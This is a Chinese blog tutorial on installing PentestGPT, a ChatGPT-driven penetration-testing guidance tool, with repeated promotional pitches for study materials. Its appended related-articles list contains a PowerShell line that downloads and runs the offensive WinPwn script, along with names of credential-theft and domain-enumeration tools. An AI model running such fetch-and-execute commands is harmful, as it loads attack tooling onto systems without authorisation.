PentestGPT-V0(1)

最新推荐文章于 2024-10-18 10:59:23 发布
最新推荐文章于 2024-10-18 10:59:23 发布
阅读量620 收藏 31
点赞数 17
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82243523/article/details/138985502
版权

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

随着信息技术的迅猛发展,网络安全问题日益突出,渗透测试成为了保护企业和组织网络安全的重要手段之一。为了提高渗透测试的效率和准确性,人工智能技术被广泛应用于该领域。本报告旨在对pentestGPTv0.9进行初步调试,PentestGPT-V0.9是一款基于ChatGPT的虚拟渗透测试助手,旨在通过与用户的对话交互,生成相应的测试点,为渗透测试提供方向性建议。

亲测也具体使用了,部分文章需要订阅(付钱)才可参考自动化渗透,简单一句话概括仅是在终端中调用openai的api,只是不需要你输入提示词,和openai会话没什么两样,并结合相关的几个库,单元框架+pytest+requests+openai库等,源码中也并没有使用到自动化相关库,仅提供渗透测试相关指导。并无自动化测试功能相关。

PentestGPT准备工作:

  1. 获取OpenAI的API密钥:需要通过OpenAI接口来访问PentestGPT,因此需要获得一个有效的OpenAI API密钥,并具备足够的访问次数。(可淘宝自行购买)
  2. 安装Python环境:PentestGPT要求Python环境的版本不低于3.10。
  3. 安装nmap工具:安装教程请参考网络文章,注意验证是否安装成功。
  4. 安装git工具:安装教程请参考网络文章,注意验证是否安装成功。
  5. 渗透工具:Nmap、Xenu等。用于渗透测试中的端口扫描和漏洞探测等任务。

PentestGPT安装:

安装视频(代理访问):https://www.youtube.com/watch?v=tGC5z14dE24

演示视频(代理访问):https://www.youtube.com/watch?v=lAjLIj1JT3c
源码地址:https://github.com/GreyDGL/PentestGPT/,可参考代码内容说明来获取PentestGPT工具安装命令。如图:

**步骤1:**我们可以新建一个文件目录pentestGPT方便代码拉取运行。如图:

**步骤2(可选择步骤):**打开CMD,可新建python虚拟环境,安装虚拟环境前需要pip install virtualenv,安装完成后virtualenv --version,如图:

**步骤3(可选择步骤):**再运行virtualenv venv来创建一个名为venv的虚拟环境,venv\Scripts\activate 命令来激活虚拟环境。如图:

**步骤4:**再代理客户端中复制cmd终端代理命令拷贝至cmd:如下:
set http_proxy=http://127.0.0.1:7890 & set https_proxy=http://127.0.0.1:7890,如图:

**步骤5:**响应完成依次输入以下命令:

1.pip3 install git+https://github.com/GreyDGL/PentestGPT


2.​git clone https://github.com/GreyDGL/PentestGPT


3.cd PentestGPT


4.pip3 install -e .


5.set OPENAI_KEY=your key here(秘钥,多个文章介绍加引号,Windows下的cmd的不需要)


6.pentestgpt-connection

注意1:我们选择粘贴复制“pentestgpt --reasoning_model=gpt-3.5-turbo-16k”。这里有可能会出现代理连接超时的情况,注意代理网络流量。提示cookie连接失败,可以不用set cookie。

注意2:pentestgpt --reasoning_model=gpt-3.5-turbo --useAPI (3.5的key用这个),且需要在openAI绑定你的信用卡账户(至于国外的信用卡)

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

)**

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化资料的朋友,可以点击这里获取

PentestGPT:一款由ChatGPT驱动的强大渗透测试工具
06-27 1461
PentestGPT是一款由ChatGPT驱动的强大渗透测试工具,该工具旨在实现渗透测试任务执行过程的自动化。该工具基于ChatGPT实现其功能,允许广大研究人员以交互式的方式使用,并指导渗透测试人员进行渗透测试任务的总体进度调控并执行指定操作。当前开发人员也正在添加自定义本地LLM模块的支持,如果你想要稳定运行以及较好的性能,建议使用OpenAI API。需要注意的是,ChatGPT的Cookie解决方案可能不是非常稳定,开发人员也一直在努力尝试设计更好的解决方案。next:执行下一步渗透测试任务操作;
强化学习与网络安全资源-论文和环境
05-14 113
【代码】强化学习与网络安全资源-论文和环境。
Pentest-Tool:我的Pentest工具
02-19
渗透测试工具 我的Pentest工具
PentestGPT-V0.9安装操作手册-辅助渗透测试工具
qq_40689436的博客
09-08 1760
本报告旨在对pentestGPTv0.9进行初步调试,PentestGPT-V0.9是一款基于ChatGPT的虚拟渗透测试助手,旨在通过与用户的对话交互,生成相应的测试点,为渗透测试提供方向性建议。To-do表示待检测的测试点,下面给出了2个操作步骤,需要我们新开一个终端cmd,并键入nmap -p- 主机ip 和 nmap -p 端口 -sV 主机IP。输入关于你需要测试的主机IP,这里就类似openai对话框,不需要输入关键词,当然你可以输入中文,但是返回内容一定是英文。
PentestGPT 开源项目安装与使用指南
gitblog_00928的博客
08-10 578
PentestGPT 开源项目安装与使用指南 项目地址:https://gitcode.com/gh_mirrors/pe/PentestGPT 1. 项目目录结构及介绍 PentestGPT 是一个基于 Large Language Model(大型语言模型),特别是 ChatGPT 的自动化渗透测试工具。以下为其典型的项目目录结构概述: PentestGPT/ ├── README.md ...
探索PentestGPT:新一代网络安全测试工具
gitblog_00033的博客
03-20 1104
探索PentestGPT:新一代网络安全测试工具 PentestGPTA GPT-empowered penetration testing tool项目地址:https://gitcode.com/gh_mirrors/pe/PentestGPT 项目简介 是一个基于OpenAI的GPT-3模型的开源项目,旨在为网络安全专业人士提供强大的自动化渗透测试和漏洞评估支持。通过自然语言处理技术,它能...
pentestGPT
09-07
PentestGPT是一个基于ChatGPT构建的渗透测试工具,旨在指导测试人员进行渗透测试。通过与ChatGPT进行交互,...<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
pentestgpt
09-12
PentestGPT是基于ChatGPT构建的一个工具,用于在渗透测试中为测试人员提供交互式的指导。它借助GPT技术,帮助测试人员进行渗透测试并指导他们在测试过程中的操作。 PentestGPT的使用方式与New AudioGPT和Gitleaks...
kali linux安装pentestGPT
10-13
1. **检查更新**:首先确保你的Kali Linux已更新到最新版本,使用命令`sudo apt update && sudo apt upgrade`。 2. **添加仓库(如果存在)**:如果pentestGPT来自第三方仓库,你可能需要添加该仓库。查找并添加...
安全大模型以及训练数据集
05-21 214
安全大模型和数据集
PentestGPT 技术文档
最新发布
gitblog_01264的博客
10-18 602
PentestGPT 技术文档 PentestGPT A GPT-empowered penetration testing tool 项目地址: https://gitcode.com/gh_mirrors/pe/Pentest...
探索PentestGPT:革新渗透测试的AI工具
gitblog_00567的博客
08-12 461
探索PentestGPT:革新渗透测试的AI工具 PentestGPTA GPT-empowered penetration testing tool项目地址:https://gitcode.com/gh_mirrors/pe/PentestGPT 项目介绍 PentestGPT 是一款由GPT技术驱动的渗透测试工具,旨在自动化和优化渗透测试流程。该工具基于OpenAI的ChatGPT构建,通过...
推荐:Windows Pentest - 强大的渗透测试工具集合
gitblog_00002的博客
05-29 566
推荐:Windows Pentest - 强大的渗透测试工具集合 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 windows-pentest 是一个专门针对Windows系统的渗透测试脚本和工具集,旨在帮助安全研究人员、系统管理员和网络安全爱好者进行系统安全性评估与漏洞检测。这个项目包括各种WMIC命令、批处理脚本以及C语言编写的程序,提供了对系统信息的检索、权...
web pentest tools
cnbird's blog
11-05 1068
 ratproxy - http://code.google.com/p/ratproxy/Paros - http://www.parosproxy.orgNikto - http://cirt.net/nikto2Wapiti - http://sourceforge.net/projects/wapiti/Proxmon - http://www.isecpartners.com/proxm
Pentest-Tools-Collection
08-05
Pentest-Tools-Collection 活动目录 AMSI 工具集 赢家 Import-Module .\WinPwn.ps1 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') 鬼包 安全带、KeeThief、Rubeus、SharpUp ... 强盗 PowerView、PowerUp、Get-GPPPassword ... 枚举 猎犬 SharpHound.exe -d testdomain.com -c all,gpolocalgroup Sharphound.ps1 -d testdomain.com -c all,gpolocalgroup bloodhoun
强化学习与网络安全资源
05-21 271
【代码】强化学习与网络安全资源。
论文翻译:A survey on large language model (LLM) security and privacy: The Good, The Bad, and The Ugly
CSPhD-winston的博客
08-05 914
大型语言模型(LLMs),如ChatGPT和Bard,已经彻底改变了自然语言理解和生成。它们具有深度语言理解能力、类似人类的文本生成能力、上下文意识和强大的问题解决技能,使它们在各个领域(例如搜索引擎、客户支持、翻译)中变得不可或缺。同时,LLMs也在安全领域获得了关注,揭示了安全漏洞并展示了它们在安全相关任务中的潜力。本文探讨了LLMs与安全性和隐私的交集。具体来说,我们研究了LLMs如何积极影响安全性和隐私,与它们使用相关的潜在风险和威胁,以及LLMs内部的固有漏洞。
渗透测试(Penetration Test,Pentest)
2301_76380919的博客
02-02 1518
网络安全行业里说的渗透测试(penetration test,pentest)是实施安全评估(即审计)的具体手段。 渗透测试可能是单独进行的一项工作,也可能是产品系统在研发生命周期里 IT 安全风险管理的一个组成部分。产品的安全性并不完全取决于 IT 方面的技术因素,还会受到与该产品有关的最佳安全实践的影响。具体而言,增强产品安全性的工作涉及安全需求分析、风险分析、威胁建模、代码审查和运营安全。 通常认为,渗透测试是安全评估最终的也是最具侵犯性的形式,它必须由符合资质的专业人士实施。在进行评估之前,有关
PentestGPT-V0(1),网络安全面试题2024笔试
m0_60721649的博客
04-06 872
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
探索未来安全测试的边界 —— PentestGPT 精彩解析与使用指南
gitblog_00593的博客
08-28 370
探索未来安全测试的边界 —— PentestGPT 精彩解析与使用指南 HackerGPT-2.0#1 Trusted ethical hacking AI for web application hacking.项目地址:https://gitcode.com/gh_mirrors/ha/HackerGPT-2.0 在信息安全的最前线,【PentestGPT】横空出世,它携带着先进的人工智能与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值